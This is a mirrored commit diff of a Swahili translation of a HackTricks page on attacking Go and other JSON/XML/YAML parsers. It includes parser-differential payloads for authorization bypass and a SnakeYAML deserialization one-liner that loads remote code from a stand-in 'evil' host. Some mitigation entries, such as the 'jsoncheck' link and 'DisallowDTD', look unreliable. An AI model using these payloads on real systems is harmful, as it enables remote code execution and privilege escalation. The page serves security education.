maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/json-xml-yaml-hacking.md'] to sw

Browse Source
This commit is contained in:
Translator 2025-08-04 20:30:49 +00:00
parent cafc5ef2ee
commit a1691f3fd4
1 changed files with 53 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

70
src/pentesting-web/json-xml-yaml-hacking.md
View File

@ -4,9 +4,9 @@
## Go JSON Decoder ## Go JSON Decoder
Masuala yafuatayo yaligundulika katika Go JSON ingawa yanaweza kuwepo katika lugha nyingine pia. Masuala haya yaliwekwa wazi katika [**hiki kipande cha blog**](https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/). Masuala yafuatayo yaligundulika katika Go JSON ingawa yanaweza kuwepo katika lugha nyingine pia. Masuala haya yalichapishwa katika [**hiki kipande cha blog**](https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/).
Parsers za JSON, XML, na YAML za Go zina historia ndefu ya kutokuelewana na mipangilio isiyo salama ambayo inaweza kutumika **kuzidi uthibitisho**, **kuinua mamlaka**, au **kuhamasisha data nyeti**. Parsers za JSON, XML, na YAML za Go zina historia ndefu ya kutokuelewana na mipangilio isiyo salama ambayo inaweza kutumika **kuzidi uthibitisho**, **kuinua mamlaka**, au **kutoa data nyeti**.
### (Un)Marshaling Data Isiyotarajiwa ### (Un)Marshaling Data Isiyotarajiwa
@ -52,8 +52,8 @@ IsAdmin bool `json:"-"`
### Parser Differentials ### Parser Differentials
Lengo ni kupita idhini kwa kutumia jinsi parser tofauti zinavyotafsiri payload sawa kwa njia tofauti kama katika: Lengo ni kupita idhini kwa kutumia jinsi parser tofauti zinavyotafsiri payload sawa kwa njia tofauti kama katika:
- CVE-2017-12635: Apache CouchDB bypass kupitia funguo za nakala - CVE-2017-12635: Apache CouchDB bypass kupitia funguo za kurudiwa
- 2022: Zoom 0-click RCE kupitia kutokuelewana kwa parser ya XML - 2022: Zoom 0-click RCE kupitia kutokuwepo kwa usawa kwa parser ya XML
- GitLab 2025 SAML bypass kupitia tabia za XML - GitLab 2025 SAML bypass kupitia tabia za XML
**1. Duplicate Fields:** **1. Duplicate Fields:**
@ -62,10 +62,10 @@ Go's `encoding/json` inachukua **field** ya **mwisho**.
json.Unmarshal([]byte(`{"action":"UserAction", "action":"AdminAction"}`), &req) json.Unmarshal([]byte(`{"action":"UserAction", "action":"AdminAction"}`), &req)
fmt.Println(req.Action) // AdminAction fmt.Println(req.Action) // AdminAction
``` ```
Waparser wengine (k.m., Jackson ya Java) wanaweza kuchukua **ya kwanza**. Waparser wengine (kwa mfano, Jackson ya Java) wanaweza kuchukua **ya kwanza**.
**2. Kutokuwa na Muktadha wa Herufi:** **2. Kutokuwa na Uthibitisho wa Kesi:**
Go haina muktadha wa herufi: Go haina uthibitisho wa kesi:
```go ```go
json.Unmarshal([]byte(`{"AcTiOn":"AdminAction"}`), &req) json.Unmarshal([]byte(`{"AcTiOn":"AdminAction"}`), &req)
// matches `Action` field // matches `Action` field
@ -89,7 +89,7 @@ Mshambuliaji anatumia:
- Python inaona `UserAction`, inaruhusu - Python inaona `UserAction`, inaruhusu
- Go inaona `AdminAction`, inatekeleza - Go inaona `AdminAction`, inatekeleza
### Mchanganyiko wa Muundo wa Takwimu (Polyglots) ### Data Format Confusion (Polyglots)
Lengo ni kutumia mifumo inayochanganya muundo (JSON/XML/YAML) au kushindwa kufungua kwenye makosa ya parser kama: Lengo ni kutumia mifumo inayochanganya muundo (JSON/XML/YAML) au kushindwa kufungua kwenye makosa ya parser kama:
- **CVE-2020-16250**: HashiCorp Vault ilipars JSON kwa kutumia parser ya XML baada ya STS kurudisha JSON badala ya XML. - **CVE-2020-16250**: HashiCorp Vault ilipars JSON kwa kutumia parser ya XML baada ya STS kurudisha JSON badala ya XML.
@ -108,21 +108,57 @@ Parser ya XML ya Go ilipars **bila kujali** na kuamini utambulisho ulioingizwa.
"ignored": "<?xml version=\"1.0\"?><Action>Action_3</Action>" "ignored": "<?xml version=\"1.0\"?><Action>Action_3</Action>"
} }
``` ```
Result:
- **Go JSON** parser: `Action_2` (case-insensitive + last wins) - **Go JSON** parser: `Action_2` (case-insensitive + last wins)
- **YAML** parser: `Action_1` (case-sensitive) - **YAML** parser: `Action_1` (case-sensitive)
- **XML** parser: parses `"Action_3"` inside the string - **XML** parser: parses `"Action_3"` inside the string
---
### 🔐 Mitigations ## Uthibitisho wa Hatari za Parser Zinazojulikana (2023-2025)
| Hatari | Suluhisho | > Masuala yafuatayo yanayoweza kutumika hadharani yanaonyesha kwamba uchambuzi usio salama ni tatizo la lugha nyingi — si tatizo la Go pekee.
|-----------------------------|---------------------------------------|
| Nyamba zisizojulikana | `decoder.DisallowUnknownFields()` |
| Nyamba za kurudi (JSON) | ❌ Hakuna suluhisho katika stdlib |
| Mechi isiyo na herufi kubwa | ❌ Hakuna suluhisho katika stdlib |
| Takataka za XML | ❌ Hakuna suluhisho katika stdlib |
| YAML: funguo zisizojulikana | `yaml.KnownFields(true)` |
### SnakeYAML Deserialization RCE (CVE-2022-1471)
* Inahusisha: `org.yaml:snakeyaml` < **2.0** (inayotumiwa na Spring-Boot, Jenkins, nk.).
* Sababu ya msingi: `new Constructor()` inachambua **darasa la Java la kiholela**, ikiruhusu mnyororo wa vifaa unaomalizika kwa utekelezaji wa msimbo wa mbali.
* One-liner PoC (itafungua kalkuleta kwenye mwenyeji aliye hatarini):
```yaml
!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ]
```
* Fix / Mitigation:
1. **Sasisha hadi ≥2.0** (inatumia `SafeLoader` kama chaguo la default).
2. Katika toleo za zamani, tumia waziwazi `new Yaml(new SafeConstructor())`.
### libyaml Double-Free (CVE-2024-35325)
* Inahusisha: `libyaml` ≤0.2.5 (maktaba ya C inayotumiwa na viunganishi vingi vya lugha).
* Tatizo: Kuita `yaml_event_delete()` mara mbili husababisha double-free ambayo washambuliaji wanaweza kugeuza kuwa DoS au, katika hali zingine, unyakuzi wa heap.
* Hali: Upstream ilikataa kama “matumizi mabaya ya API”, lakini usambazaji wa Linux ulisambaza **0.2.6** iliyorekebishwa ambayo inafanya null-free pointer kwa njia ya kujihami.
### RapidJSON Integer (Under|Over)-flow (CVE-2024-38517 / CVE-2024-39684)
* Inahusisha: Tencent **RapidJSON** kabla ya commit `8269bc2` (<1.1.0-patch-22).
* Kosa: Katika `GenericReader::ParseNumber()` hesabu isiyoangaliwa inawawezesha washambuliaji kuunda nambari kubwa ambazo zinapita na kuharibu heap — hatimaye kuwezesha kupandisha hadhi wakati grafu ya kitu inayotokana inatumika kwa maamuzi yaidhinishaji.
---
### 🔐 Mitigations (Updated)
| Hatari | Fix / Recommendation |
|-------------------------------------|------------------------------------------------------------|
| Nyamba zisizojulikana (JSON) | `decoder.DisallowUnknownFields()` |
| Nyamba za kurudiwa (JSON) | ❌ Hakuna fix katika stdlib — thibitisha na [`jsoncheck`](https://github.com/dvsekhvalnov/johnny-five) |
| Mechi isiyo na herufi kubwa (Go) | ❌ Hakuna fix — thibitisha lebo za muundo + pre-canonicalize input |
| Takataka za XML / XXE | Tumia parser iliyoimarishwa (`encoding/xml` + `DisallowDTD`) |
| Funguo zisizojulikana za YAML | `yaml.KnownFields(true)` |
| **Deserialization ya YAML isiyo salama** | Tumia SafeConstructor / sasisha hadi SnakeYAML ≥2.0 |
| libyaml ≤0.2.5 double-free | Sasisha hadi **0.2.6** au toleo lililorekebishwa na distro |
| RapidJSON <patched commit | Jenga dhidi ya RapidJSON ya hivi karibuni (Julai 2024) |
## References
- Baeldung “Resolving CVE-2022-1471 With SnakeYAML 2.0”
- Ubuntu Security Tracker CVE-2024-35325 (libyaml)
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}